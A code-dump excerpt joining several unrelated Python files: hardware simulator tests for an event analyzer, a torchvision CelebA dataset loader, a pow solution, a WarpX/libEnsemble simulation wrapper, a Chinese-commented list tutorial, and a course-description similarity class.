(2, {"0": 0xabcd}),
])
@simulation_test(sources=(24,))
def test_one_24bit_src(self, tb):
yield from tb.trigger(0, 0xabcdef)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd, 0xef
], [
(2, {"0": 0xabcdef}),
])
@simulation_test(sources=(32,))
def test_one_32bit_src(self, tb):
yield from tb.trigger(0, 0xabcdef12)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0xab, 0xcd, 0xef, 0x12
], [
(2, {"0": 0xabcdef12}),
])
@simulation_test(sources=(0,))
def test_one_0bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
], [
(2, {"0": None}),
])
@simulation_test(sources=(0,0))
def test_two_0bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.trigger(1, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
REPORT_EVENT|1,
], [
(2, {"0": None, "1": None}),
])
@simulation_test(sources=(0,1))
def test_0bit_1bit_src(self, tb):
yield from tb.trigger(0, 0)
yield from tb.trigger(1, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0,
REPORT_EVENT|1, 0b1
], [
(2, {"0": None, "1": 0b1}),
])
@simulation_test(sources=(1,0))
def test_1bit_0bit_src(self, tb):
yield from tb.trigger(0, 1)
yield from tb.trigger(1, 0)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b1,
REPORT_EVENT|1,
], [
(2, {"0": 0b1, "1": None}),
])
@simulation_test(sources=((3, (("a", 1), ("b", 2))),))
def test_fields(self, tb):
yield from tb.trigger(0, 0b101)
yield from tb.step()
yield from tb.trigger(0, 0b110)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b101,
REPORT_DELAY|1,
REPORT_EVENT|0, 0b110,
], [
(2, {"a-0": 0b1, "b-0": 0b10}),
(3, {"a-0": 0b0, "b-0": 0b11}),
])
@simulation_test(sources=(8,))
def test_delay(self, tb):
yield
yield
yield from tb.trigger(0, 0xaa)
yield from tb.step()
yield
yield from tb.trigger(0, 0xbb)
yield from tb.step()
yield
yield
yield from self.assertEmitted(tb, [
REPORT_DELAY|4,
REPORT_EVENT|0, 0xaa,
REPORT_DELAY|2,
REPORT_EVENT|0, 0xbb,
], [
(4, {"0": 0xaa}),
(6, {"0": 0xbb}),
])
@simulation_test(sources=(1,))
def test_delay_2_septet(self, tb):
yield tb.dut._delay_timer.eq(0b1_1110000)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b1110001,
REPORT_EVENT|0, 0b1
], [
(0b1_1110001, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_3_septet(self, tb):
yield tb.dut._delay_timer.eq(0b01_0011000_1100011)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b0011000,
REPORT_DELAY|0b1100100,
REPORT_EVENT|0, 0b1
], [
(0b01_0011000_1100100, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_max(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000011,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1111111,
REPORT_EVENT|0, 0b1
], [
(0xffff, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_overflow(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000000,
REPORT_EVENT|0, 0b1
], [
(0x10000, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_overflow_p1(self, tb):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000001,
REPORT_EVENT|0, 0b1
], [
(0x10001, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_delay_4_septet(self, tb):
for _ in range(64):
yield tb.dut._delay_timer.eq(0xfffe)
yield
yield from tb.trigger(0, 1)
yield from tb.step()
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000001,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1111111,
REPORT_DELAY|0b1000001,
REPORT_EVENT|0, 0b1
], [
(0xffff * 64 + 1, {"0": 0b1}),
])
@simulation_test(sources=(1,))
def test_done(self, tb):
yield from tb.trigger(0, 1)
yield from tb.step()
yield
yield tb.dut.done.eq(1)
yield from self.assertEmitted(tb, [
REPORT_DELAY|2,
REPORT_EVENT|0, 0b1,
REPORT_DELAY|2,
REPORT_SPECIAL|SPECIAL_DONE
], [
(2, {"0": 0b1}),
(4, {})
], flush_pending=False)
@simulation_test(sources=(1,))
def test_throttle_hyst(self, tb):
for x in range(17):
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.throttle), 0)
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.throttle), 1)
yield tb.fifo.re.eq(1)
for x in range(51):
yield
yield tb.fifo.re.eq(0)
yield
self.assertEqual((yield tb.dut.throttle), 0)
@simulation_test(sources=(1,))
def test_overrun(self, tb):
for x in range(20):
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.overrun), 0)
yield from tb.trigger(0, 1)
yield from tb.step()
self.assertEqual((yield tb.dut.overrun), 1)
yield tb.fifo.re.eq(1)
for x in range(61):
while not (yield tb.fifo.readable):
yield
yield
yield tb.fifo.re.eq(0)
yield
yield from self.assertEmitted(tb, [
REPORT_DELAY|0b0000100,
REPORT_DELAY|0b0000000,
REPORT_DELAY|0b0000000,
REPORT_SPECIAL|SPECIAL_OVERRUN,
], [
(0x10000, "overrun"),
], flush_pending=False)
| [
"[email protected]"
] | |
bfd4888edb395deaddfdc4022c9b829b04107625 | 024046de7eb1ffd46c77456418b1073e84af15b1 | /torchvision/prototype/datasets/_builtin/celeba.py | ebfce4b652d5b78be5975d14d7c04ac8e4548bb6 | [
"BSD-3-Clause"
] | permissive | jiafatom/vision | ce31eba6fdffce77e9370e0816ffeb0d743bad80 | 7839bdbe1389e734b00529edd9a7566bb8701588 | refs/heads/main | 2023-08-27T22:56:28.723162 | 2021-10-25T19:10:20 | 2021-10-25T19:10:20 | 319,733,821 | 0 | 0 | BSD-3-Clause | 2020-12-08T19:01:41 | 2020-12-08T19:01:40 | null | UTF-8 | Python | false | false | 6,753 | py | import csv
import io
from typing import Any, Callable, Dict, List, Optional, Tuple, Iterator, Sequence
import torch
from torchdata.datapipes.iter import (
IterDataPipe,
Mapper,
Shuffler,
Filter,
ZipArchiveReader,
Zipper,
KeyZipper,
)
from torchvision.prototype.datasets.utils import (
Dataset,
DatasetConfig,
DatasetInfo,
GDriveResource,
OnlineResource,
DatasetType,
)
from torchvision.prototype.datasets.utils._internal import INFINITE_BUFFER_SIZE, getitem, path_accessor
csv.register_dialect("celeba", delimiter=" ", skipinitialspace=True)
class CelebACSVParser(IterDataPipe[Tuple[str, Dict[str, str]]]):
def __init__(
self,
datapipe: IterDataPipe[Tuple[Any, io.IOBase]],
*,
fieldnames: Optional[Sequence[str]] = None,
) -> None:
self.datapipe = datapipe
self.fieldnames = fieldnames
def __iter__(self) -> Iterator[Tuple[str, Dict[str, str]]]:
for _, file in self.datapipe:
file = (line.decode() for line in file)
if self.fieldnames:
fieldnames = self.fieldnames
else:
# The first row is skipped, because it only contains the number of samples
next(file)
# Empty field names are filtered out, because some files have an extra white space after the header
# line, which is recognized as extra column
fieldnames = [name for name in next(csv.reader([next(file)], dialect="celeba")) if name]
# Some files do not include a label for the image ID column
if fieldnames[0] != "image_id":
fieldnames.insert(0, "image_id")
for line in csv.DictReader(file, fieldnames=fieldnames, dialect="celeba"):
yield line.pop("image_id"), line
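# For reference, the CelebA annotation files handled above look roughly like this (illustrative
# excerpt in the spirit of list_attr_celeba.txt): a first line with the number of samples, a
# header line with the field names, then one whitespace-separated row per image:
#
#   202599
#   5_o_Clock_Shadow Arched_Eyebrows ...
#   000001.jpg -1 1 ...
#
# which is why the parser skips the first row and, when needed, inserts "image_id" as the name
# of the first column.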
class CelebA(Dataset):
@property
def info(self) -> DatasetInfo:
return DatasetInfo(
"celeba",
type=DatasetType.IMAGE,
homepage="https://mmlab.ie.cuhk.edu.hk/projects/CelebA.html",
)
def resources(self, config: DatasetConfig) -> List[OnlineResource]:
splits = GDriveResource(
"0B7EVK8r0v71pY0NSMzRuSXJEVkk",
sha256="fc955bcb3ef8fbdf7d5640d9a8693a8431b5f2ee291a5c1449a1549e7e073fe7",
file_name="list_eval_partition.txt",
)
images = GDriveResource(
"0B7EVK8r0v71pZjFTYXZWM3FlRnM",
sha256="46fb89443c578308acf364d7d379fe1b9efb793042c0af734b6112e4fd3a8c74",
file_name="img_align_celeba.zip",
)
identities = GDriveResource(
"1_ee_0u7vcNLOfNLegJRHmolfH5ICW-XS",
sha256="c6143857c3e2630ac2da9f782e9c1232e5e59be993a9d44e8a7916c78a6158c0",
file_name="identity_CelebA.txt",
)
attributes = GDriveResource(
"0B7EVK8r0v71pblRyaVFSWGxPY0U",
sha256="f0e5da289d5ccf75ffe8811132694922b60f2af59256ed362afa03fefba324d0",
file_name="list_attr_celeba.txt",
)
bboxes = GDriveResource(
"0B7EVK8r0v71pbThiMVRxWXZ4dU0",
sha256="7487a82e57c4bb956c5445ae2df4a91ffa717e903c5fa22874ede0820c8ec41b",
file_name="list_bbox_celeba.txt",
)
landmarks = GDriveResource(
"0B7EVK8r0v71pd0FJY3Blby1HUTQ",
sha256="6c02a87569907f6db2ba99019085697596730e8129f67a3d61659f198c48d43b",
file_name="list_landmarks_align_celeba.txt",
)
return [splits, images, identities, attributes, bboxes, landmarks]
_SPLIT_ID_TO_NAME = {
"0": "train",
"1": "valid",
"2": "test",
}
def _filter_split(self, data: Tuple[str, Dict[str, str]], *, split: str) -> bool:
return self._SPLIT_ID_TO_NAME[data[1]["split_id"]] == split
def _collate_anns(self, data: Tuple[Tuple[str, Dict[str, str]], ...]) -> Tuple[str, Dict[str, Dict[str, str]]]:
(image_id, identity), (_, attributes), (_, bbox), (_, landmarks) = data
return image_id, dict(identity=identity, attributes=attributes, bbox=bbox, landmarks=landmarks)
def _collate_and_decode_sample(
self,
data: Tuple[Tuple[str, Tuple[str, List[str]], Tuple[str, io.IOBase]], Tuple[str, Dict[str, Any]]],
*,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> Dict[str, Any]:
split_and_image_data, ann_data = data
_, _, image_data = split_and_image_data
path, buffer = image_data
_, ann = ann_data
image = decoder(buffer) if decoder else buffer
identity = int(ann["identity"]["identity"])
attributes = {attr: value == "1" for attr, value in ann["attributes"].items()}
bbox = torch.tensor([int(ann["bbox"][key]) for key in ("x_1", "y_1", "width", "height")])
landmarks = {
landmark: torch.tensor((int(ann["landmarks"][f"{landmark}_x"]), int(ann["landmarks"][f"{landmark}_y"])))
for landmark in {key[:-2] for key in ann["landmarks"].keys()}
}
return dict(
path=path,
image=image,
identity=identity,
attributes=attributes,
bbox=bbox,
landmarks=landmarks,
)
def _make_datapipe(
self,
resource_dps: List[IterDataPipe],
*,
config: DatasetConfig,
decoder: Optional[Callable[[io.IOBase], torch.Tensor]],
) -> IterDataPipe[Dict[str, Any]]:
splits_dp, images_dp, identities_dp, attributes_dp, bboxes_dp, landmarks_dp = resource_dps
splits_dp = CelebACSVParser(splits_dp, fieldnames=("image_id", "split_id"))
splits_dp = Filter(splits_dp, self._filter_split, fn_kwargs=dict(split=config.split))
splits_dp = Shuffler(splits_dp, buffer_size=INFINITE_BUFFER_SIZE)
images_dp = ZipArchiveReader(images_dp)
anns_dp = Zipper(
*[
CelebACSVParser(dp, fieldnames=fieldnames)
for dp, fieldnames in (
(identities_dp, ("image_id", "identity")),
(attributes_dp, None),
(bboxes_dp, None),
(landmarks_dp, None),
)
]
)
anns_dp = Mapper(anns_dp, self._collate_anns)
dp = KeyZipper(
splits_dp,
images_dp,
key_fn=getitem(0),
ref_key_fn=path_accessor("name"),
buffer_size=INFINITE_BUFFER_SIZE,
keep_key=True,
)
dp = KeyZipper(dp, anns_dp, key_fn=getitem(0), buffer_size=INFINITE_BUFFER_SIZE)
return Mapper(dp, self._collate_and_decode_sample, fn_kwargs=dict(decoder=decoder))
| [
"[email protected]"
] | |
97cc36dd32b2d5cd5c4ab97c7b39c7420193152f | 8b9c84f2540ef9de8830232898b7b3636523ceff | /Problem1.py | 4d8d558f4df6dcc8a1440776e4ca8d187309fb29 | [] | no_license | s-andromeda/Binary-Search-3 | e06b73352af51666bd7d8bf0f4f33a6ec54b9dba | eafd90e65bd04ca544c80d5f24a9ceef55786ad2 | refs/heads/master | 2022-11-17T07:18:50.414405 | 2020-07-21T07:06:29 | 2020-07-21T07:06:29 | 280,072,057 | 0 | 0 | null | 2020-07-16T06:24:20 | 2020-07-16T06:24:19 | null | UTF-8 | Python | false | false | 704 | py | """
Student : Shahreen Shahjahan Psyche
Time : O(log N) [binary search]
Space : O(1) [No Auxiliary Space Has Been Used]
Pased Test Cases : Yes
"""
class Solution:
def myPow(self, x: float, n: int) -> float:
# base case
if n == 0:
return 1
# calling recursive function after halfing n
temp = self.myPow(x, int(n/2))
# if n is even
if n%2 == 0:
return temp * temp
else:
# if n is positive
if n > 0:
return temp * temp * x
else:
return temp * temp * (1/x)
| [
"[email protected]"
] | |
f9f6066f5029d0b9a9d17b03d3525476857e4fb2 | 2d5d17225ddabe81f17b74589895f49e530344f8 | /testchild.py | bd5664d3017ce696e7674d7c93dc078eddbccbca | [] | no_license | Gracia958/testrepo | 230644e4976414c67e12a508d14f832e3d73d7d9 | db898e9748ab851b65421ae7819019cd5211b64b | refs/heads/master | 2022-11-27T13:10:05.071494 | 2020-07-28T07:19:54 | 2020-07-28T07:19:54 | 282,127,528 | 0 | 0 | null | 2020-07-28T07:19:55 | 2020-07-24T05:03:38 | Python | UTF-8 | Python | false | false | 64 | py | ##Add a new file in child branch.
print ("Inside Child branch")
| [
"[email protected]"
] | |
b9d01644c808a33c9c69100e16e1b4652eec57a9 | 1616b2a7082196182a853ac85a336974f80dc680 | /Tools/LibEnsemble/warpx_simf.py | 8822d22efe1fcf163ab6f931080add47b6f9903e | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause",
"BSD-3-Clause-LBNL"
] | permissive | RevathiJambunathan/WarpX | a034416ae9369e48bc1f7c2ed95fa6800eb5f522 | 85bc4610adbdd5a48f1cbe666f11db6b72a781c0 | refs/heads/development | 2023-09-01T12:49:36.522416 | 2021-01-27T18:02:18 | 2021-01-27T18:02:18 | 174,003,690 | 0 | 4 | NOASSERTION | 2023-09-13T00:30:57 | 2019-03-05T18:59:20 | C++ | UTF-8 | Python | false | false | 4,170 | py | import os
import time
import numpy as np
from libensemble.executors.executor import Executor
from libensemble.message_numbers import WORKER_DONE, TASK_FAILED
from read_sim_output import read_sim_output
from write_sim_input import write_sim_input
"""
This file is part of the suite of scripts to use LibEnsemble on top of WarpX
simulations. It defines a sim_f function that takes LibEnsemble history and
input parameters, runs a WarpX simulation, and returns 'f'.
"""
def run_warpx(H, persis_info, sim_specs, libE_info):
"""
This function runs a WarpX simulation and returns quantity 'f' as well as
other physical quantities measured in the run for convenience. Status check
is done periodically on the simulation, provided by LibEnsemble.
"""
# Setting up variables needed for input and output
# keys = variable names
# x = variable values
# libE_output = what will be returned to libE
calc_status = 0 # Returns to worker
input_file = sim_specs['user']['input_filename']
time_limit = sim_specs['user']['sim_kill_minutes'] * 60.0
machine_specs = sim_specs['user']['machine_specs']
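    # A rough sketch of what sim_specs is expected to contain at this point (key names are taken
    # from the lookups above; the concrete values are only illustrative):
    #   sim_specs = {
    #       'user': {
    #           'input_filename': 'inputs',            # WarpX input deck passed on the command line
    #           'sim_kill_minutes': 10,                 # wall-clock limit before the task is killed
    #           'machine_specs': {'name': 'local', 'cores': 8, 'OMP_NUM_THREADS': '2'},
    #       },
    #       'out': [('f', float), ('energy_std', float), ...],   # dtype used for libE_output below
    #   }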
exctr = Executor.executor # Get Executor
# Modify WarpX input file with input parameters calculated by gen_f
# and passed to this sim_f.
write_sim_input(input_file, H['x'])
# Passed to command line in addition to the executable.
# Here, only input file
app_args = input_file
os.environ["OMP_NUM_THREADS"] = machine_specs['OMP_NUM_THREADS']
# Launch the executor to actually run the WarpX simulation
if machine_specs['name'] == 'summit':
task = exctr.submit(calc_type='sim',
extra_args=machine_specs['extra_args'],
app_args=app_args,
stdout='out.txt',
stderr='err.txt',
wait_on_run=True)
else:
task = exctr.submit(calc_type='sim',
num_procs=machine_specs['cores'],
app_args=app_args,
stdout='out.txt',
stderr='err.txt',
wait_on_run=True)
# Periodically check the status of the simulation
poll_interval = 1 # secs
while(not task.finished):
time.sleep(poll_interval)
task.poll()
if task.runtime > time_limit:
task.kill() # Timeout
# Set calc_status with optional prints.
if task.finished:
if task.state == 'FINISHED':
calc_status = WORKER_DONE
elif task.state == 'FAILED':
print("Warning: Task {} failed: Error code {}"
.format(task.name, task.errcode))
calc_status = TASK_FAILED
elif task.state == 'USER_KILLED':
print("Warning: Task {} has been killed"
.format(task.name))
else:
print("Warning: Task {} in unknown state {}. Error code {}"
.format(task.name, task.state, task.errcode))
# Safety
time.sleep(0.2)
# Get output from a run and delete output files
warpx_out = read_sim_output(task.workdir)
# Excluding results - NaN - from runs where beam was lost
if (warpx_out[0] != warpx_out[0]):
print(task.workdir, ' output led to NaN values (beam was lost or run did not finish)')
# Pass the sim output values to LibEnsemble.
# When optimization is ON, 'f' is then passed to the generating function
# gen_f to generate new inputs for next runs.
# All other parameters are here just for convenience.
libE_output = np.zeros(1, dtype=sim_specs['out'])
libE_output['f'] = warpx_out[0]
libE_output['energy_std'] = warpx_out[1]
libE_output['energy_avg'] = warpx_out[2]
libE_output['charge'] = warpx_out[3]
libE_output['emittance'] = warpx_out[4]
libE_output['ramp_down_1'] = H['x'][0][0]
libE_output['ramp_down_2'] = H['x'][0][1]
libE_output['zlens_1'] = H['x'][0][2]
libE_output['adjust_factor'] = H['x'][0][3]
return libE_output, persis_info, calc_status
| [
"[email protected]"
] | |
84b2147114b80a5def71d56900706a173d972b84 | 8322fc54e79c8311f8503c22236d146f3a9e4c00 | /day03/02_python列表-list.py | ac8ae40a71a92a073eb038858d48346519c45db9 | [] | no_license | syasky/python | c8adae0014d1c3d221771f2ef06948d38aed2b7f | e88396503b2c9acaade8753ba6bcc9abbac3d145 | refs/heads/master | 2022-11-10T18:16:52.119695 | 2020-06-25T11:41:36 | 2020-06-25T11:41:36 | 274,897,249 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,413 | py | #创建列表
list1=[1,2,3,'口罩','cov']
print(list1)
print(type(list1))
list2=[1,2,3,4]
print(list2)
list3=['a','b','c','d']
print(list3)
str1='hello'
list4=[str1,True,1,None,list3]
print(list4)
print('--------------------------------------------------------------')
'''
一个变量存三组数据
1组:一万,二万,三万
2组:四条,五条,六条
3组:七筒,八筒,九筒
'''
mahjong = [
['一万','二万','三万'],
['四条','五条','六条'],
['七筒','八筒','九筒']
]
#mahjong 是一个二维列表
print(mahjong)
#三维数组
threeD=[mahjong,mahjong]
print(threeD)
print('===============操作===============')
#----------1.创建----------
#快速创建 单一 值 的 纯字符串组成的list,可以用 list(str)
list5=['a','b','c']
print(list5)
list6=list('abcdefg123')
print(list6)
#list()内直接放数字可以吗?
# list(123) 不可以,因为数字是不可迭代的,不能 list() 转换位列表
#创建不是单一数据的列表
#字符串 转换
# str.split('x') 以x将str 进行分割成 list
list7='熊大/熊二/熊三'.split('/')
print(list7)
#----------2.读取列表----------
#使用 索引 或者 下标 从0开始代表第一个
list8=[2,3,4,'a','b','c']
#读取2
print(list8[0])
#读取'a'
print(list8[3])
#读取'c'. 读取可以反正读,最后一个是-1
print(list8[-1])
#假设 不知道 list8 多少个数,读取第10个数
#print(list8[9]) 会报错
#我们有个方法可以读取list 值的个数,或者说长度 len() length
print(len(list8))
#--我们不仅可以读一个数据, 还可以读一堆数据
'''
语法: list[start:end:step]
start :开始的位置,不写的话,默认开头为0
end :接受的位置(不包含结束位),不屑的话,默认 结尾+1
step : 读取的步长,默认是1,可以为负数倒着读
'''
list9=[1,2,3,4,5,6,7,8,9,10]
#list9=range(1,11)
#读取 list9 偶数位数据
print(list9[1:10:2])
print(list9[1:100:2])
print(list9[1::2])
#如果list的长度过长,恶魔也想往后取,但是数起来太麻烦,用len()
print(list9[1:len(list9):2])
#rang list9 倒叙输出
print(list9[-1::-1])
# print(list9[10::-1])
print(list9[::-1])
print(list9[len(list9)::-1])
#读取8 6 4 2
print(list9[-3::-2])
print(list9[len(list9)-3::-2])
#正取2468,倒过来
print(list9[1:-2:2][::-1])
#读取数据,偶尔遇到一种情况,以xxx位置为基础,再操作
#如果读取某个数据往后的几个数据
#5往后的三个数据
print(list9.index(5))
print(list9[list9.index(5):list9.index(5)+3])
#字符串的 某个字符开始
str2='abcdefghij'
print(str2.find('d'))
#----------3.更新列表----------
print('----------3.更新列表----------')
list10=[10,20,30]
#增加数据到xxx的结尾
#语法: xxx.append(yy)将yy增加到xxx列表的结尾
#增加40到结尾
list10.append(40)
print(list10)
#还可以增加任意数据类型
list10.append(['a','b','c'])
print(list10)
#xxx.insert(index,yy) 将yy放到xxx的index 索引位
list10.insert(0,1)
print(list10)
list10.insert(len(list10),'d')
print(list10)
#更改数据,xxx[index]='新值'
#如将1改为1024 当成将list10的某个索引位的值换个 内存地址 的指向
list10[0]=1024
print(list10)
#同一个值,内存地址一样
a=10
print(id(a))
b=10
print(id(b))
print(id(list10[1]))
ss=['a','b','c']
print(id(ss))
print(id(list10[5]))
ss1=['f','g']
list10.append(ss1)
print(list10)
print(id(ss1))
print(id(list10[-1]))
ss1[0]='ffffffffffff'
print(list10)
#----------4.删除数据----------
#语法 del xxx[索引] .delete 单词
del list10[0]
print(list10)
# 也可以删除整个list10,释放内存
del list10
#删除后 操作list10 ,会报错
# print(list10)
#----------5.列表的操作符----------
# + 连接列表
aa=[1,2,3]
bb=['4',5,6]
cc=aa+bb
print(cc)
# * 扩展 list的倍数个
shasha=aa*2
print(shasha)
# in 想象成去 教室找人,xx in 更多结果 if 使用
classroom=['张三','李四','王五']
flag=('李四' in classroom)
print(flag)
print('李四' in classroom)
flag2=('沙沙' in classroom)
print(flag2)
#if
if '张三' in classroom:
print('请你吃饭')
| [
"[email protected]"
] | |
63459c05f9decea9fb591739d9950284975a7236 | 11594333854f35e942fde4db523a543aa74c6000 | /Similarities.py | ab699aedb9ecf4b6f72de97b2486aad55e137f37 | [] | no_license | Epsilon456/WordSimilarities | 2f43ce209470cb17810dee9860abb4b6a835a399 | 5f25cbbb1383dd3fc16a4fa38ea011412df3776e | refs/heads/master | 2023-05-31T22:23:36.937710 | 2019-11-18T21:58:20 | 2019-11-18T21:58:20 | 221,731,186 | 1 | 0 | null | 2023-05-22T22:33:00 | 2019-11-14T15:38:53 | Python | UTF-8 | Python | false | false | 17,423 | py | import Levenshtein as LV
import gensim
import pandas as pd
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity
"""This script contains a single class which in turn, contains all 5 of the methods to be tested (as well as their
initialization functions.) The five methods are as follows:
1) Jacard Similarity between course descriptions
2) Levenshtein Distance between course names
3) Similarity of the average Word2Vec encoding of course descriptions
4) Similarity of the Doc2Vec encodings of course descriptions.
5) Similarity of the "matrix" encoding using the pretrained GloVe encodings.
(The matrix encoding is a concatenation of 4 encoding vectors:
1) The average of all word vector encodings in the description.
2) The average + 1 st dev of all vector encodings
3) A vector consisting of the max values of all vector encodings
4) A vector consisting of the min values of all vector encodings.)
The methods used to call these are as follows:
Jacard
Lev
WordSim
DocSim
GloveSim
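A rough usage sketch (course ids are purely illustrative; the expected dataframe layout is
described in the method docstrings below):
    sims = Similarities(trainDF, mode="All")
    score = sims.WordSim(testDF, listCourse="cs101", inCourse="cs201")
Each method returns a single similarity score where higher means the two course
descriptions are closer.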
"""
class Similarities:
"""This class takes in a training data frame that is used to train the word2vec and doc2vec embeddings.
    The 5 methods can then be called when passed the test data frame.
Initialize this class with:
trainDF - The dataframe used to train the embeddings. This will also be the dataframe from which
the program will pull the course closest to the test course.
Mode - Either "All" for initializing all 5 methods or "Word" for only initializing "WordSim"
"""
def __init__(self,trainDF,mode="All"):
self.GloveFail = False
self.mode = mode
#The input training data frame.
self.trainDF = trainDF
#Transforms the text strings from the descriptions into a list of list of words.
self._initText()
#Initializes and trains the word2vec embeddings.
self._initWordVec()
#Only initialize DocSim and GloveSim if required.
if mode == "All":
#Initializes and trains the doc2vec embeddigns.
self._initDocVec()
#Loads in the pretrained GloVe data.
self._initGloveVec()
#Build a dictionary containing the embeddings for each description. This make it so that the
#the embedding functions only need to be called once for the test course which will then
#be compared to the embeddings in this dictionary.
self.VDF = {"Word":{},"Doc":{},"Glove":{}}
self._BuildSims()
def _initText(self):
#Get text from descriptions. The variable is a nested list where the outer list represents
#each description and the inner list is each word in that description.
self.texts = []
for index, row in self.trainDF.iterrows():
self.texts.append(row['description'].split())
print("Text initialized")
def _initWordVec(self):
#Load the list of list consisting of the course descriptions into the word2vec model. Train the model
self.WordVecModel = gensim.models.Word2Vec(self.texts,size=300,window=5,min_count=2,workers=4,iter=100)
print("Word2Vec Model initialized")
def _initDocVec(self):
#Initializes and trains the doc2vec embedding
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
documents = []
#Iterate through each course description and store each as a tagged docuent. Create list of
#tagged documents.
for i in range(len(self.texts)):
documents.append(TaggedDocument(self.texts[i],[i]))
#Train the doc2vec model with the tagged documents.
self.DocVecModel = Doc2Vec(documents, vector_size=300, window=5, min_count=2, workers=4,epochs=100)
print("Doc2Vec Model initialized")
def _initGloveVec(self):
#Initializes the pre-trained GloVe model.
import Setup
import pickle
import os
#If the model has already been saved, import it from the pickle file and store to the variabe "word_vectors"
if os.path.exists(Setup.gloveJar):
with open(Setup.gloveJar,'rb') as f:
glove = pickle.load(f)
self.gloveModel = glove
#If the model has not already been saved, call the api downloader to download the model.
else:
print("Downloading GloVe word embeddings with gensim...")
"Maybe add an option to switch off pickle mode?"
try:
import gensim.downloader as api
glove = api.load("glove-wiki-gigaword-100")
#Once the model has been downloaded, save the word_vectors as a pickle file for later use.
with open(Setup.gloveJar,'wb') as f:
pickle.dump(glove,f)
print("word vectors saved to .pkl file")
self.gloveModel = glove
print("Glove model initialized")
except:
print("Glove Sim model failed to download")
self.GloveFail = True
#Allow word vectors to be accessed by other methods in the class.
def Jacard(self,testDf,listCourse,inCourse):
"""Calculates the Jacard similarity between two course descriptions.
Inputs:
testDF - The test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a,b - each of these is a string representing the course number.
Outputs:
The Jacard similarity score scaled between 0 and 1.
"""
#Obtain the course descriptions for the two course indexes inputed into the function.
A = self.trainDF['description'][listCourse]
B = testDf['description'][inCourse]
#Create a set of words for each description.
setA = set(A.split())
setB = set(B.split())
#Count the number of words in set a that are also in set b.
score = 0
for a in setA:
if a in setB:
score +=1
#Divide the number by the total length of both sets.
return score/(len(setA.union(setB)))
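    # Worked example (illustrative): for the descriptions "intro to linear algebra" and
    # "advanced linear algebra" the shared words are {"linear", "algebra"} and the union has
    # 5 distinct words, giving a Jaccard score of 2/5 = 0.4.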
def Lev(self,testDf,listCourse,inCourse):
"""Calculates the Levenshtein distance between two course names.
Inputs:
testDF - The test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a,b - each of these is a string representing the course number.
Outputs:
            The complement of the normalized Levenshtein distance
            (The complement is calculated by 1-(L/D) where L is the Levenshtein distance and D is the length of the
longer of the two strings)
This number is scaled between 0 and 1 where 1 represents a perfect match.
"""
        #Obtain the course names for the two courses provided
A = self.trainDF['name'][listCourse]
B = testDf['name'][inCourse]
#Figure out the length of the longest course name.
maxLen = max(len(A),len(B))
        #Calculate the complement of the normalized Levenshtein distance.
return 1-LV.distance(A,B)/maxLen
def _WordSimAveVec(self,df,a):
"""Calculates the a document embedding vector by taking the average of all word vectors in the document. This is
a helper function to be used with the "WordSim" method.
Inputs:
testDF - A test dataframe consisting of columns ('index','description','preqNames',and 'school') with rows
consisting of the course number indexes (all lowercase no colons.)
a - A string representing the course number
Output:
A vector embedding representing the entire document.
"""
#Obtain the course description for the course provided and convert the string into a list of individual words.
Description = df['description'][a].split()
#Create a placeholder zero vector of the same size as the vector embedding.
Vector = np.zeros(self.WordVecModel.layer1_size)
wordCount = 0
#Iterate over each word in the description.
for word in Description:
#If the word is in the trained vocabulary, obtain the word vector.
#Continue to add the word vectors to the placeholder vector to get the running sum.
if word in self.WordVecModel.wv.vocab:
vector = self.WordVecModel.wv.get_vector(word)
Vector +=vector
#Keep track of how many word vectors (which were included in the vocabulary) were added.
wordCount +=1
#Calculate the mean by dividing the sum by the number of vectors.
return Vector/wordCount
def _BuildSims(self):
"""Builds up the dictionary "self.VDF" to contain all of the document vector embeddings which are in
